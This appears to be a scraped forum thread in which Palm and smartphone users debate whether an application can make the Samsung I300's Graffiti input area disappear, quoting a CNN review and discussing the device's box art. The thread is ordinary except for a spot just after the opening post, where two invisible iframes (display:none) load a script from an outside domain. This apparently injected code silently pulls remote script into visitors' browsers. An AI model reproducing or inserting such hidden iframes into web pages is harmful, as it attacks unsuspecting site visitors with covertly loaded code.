+ Reply to Thread

Graffiti area disappear?

I know a thread had been started previously regarding the possibility of making the graffiti area disappear while using the Palm aspect of the I300, yet no solution has yet been found to do this. I was just reading a CNN review of the Samsung I300 in which the VP of sales of Samsung stated that an application will allow the graffiti area to disappear. Here is the copied and pasted text from the article below:

"To maximize the screen size, Samsung made the phone keypad a touch-screen application, similar to a Palm calculator. As with the recently announced HandEra 330 PDA, with a certain application you can make the Samsung's graffiti-writing area disappear and so enlarge the overall display area, Skarzynski says."

The link to the article itself is below:
    http://www.cnn.com/2001/TECH/ptech/0...idg/index.html

Thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

smartphonecentral.com
    I always thought he was talking about the phone app that erases the Graffiti area. Some have posted about seeing some functions in the ROMS that appear to have some connection to the 'soft' Graffiti area, but that's a long way from being able to exploit it in an app.

A number of us are hoping Samsung releases tools so apps can be developed to use the whole screen. I, for one, would love to be able to rotate the screen 180 degrees, as well.

I agree. The man chose his words carefully when he said"with a certain application." That certain application may be the phone application. Let's hope not.

Yeah, I was thinking he was referring to the phone application. But the use of "a certain application" opens the possibility. Also, looking at the back of the box the I300 came in, it shows the I300 with the full screen view browing the Internet with the Blazer software.

Administrator

Arrow

Originally posted by Stillen_I30
    Yeah, I was thinking he was referring to the phone application. But the use of "a certain application" opens the possibility. Also, looking at the back of the box the I300 came in, it shows the I300 with the full screen view browing the Internet with the Blazer software.
    he chose his words carefully just so the issue wouldbe open... and from your posts it seems he accomplished that...

it would be sad is there is a application that would make the graffiti disappear and samsung would keep it from us... i myself think its the phone sections you guys mentioned..

that pic on the back of the box is CG rendered and was probably produced well before the i300 was even off the assembly line...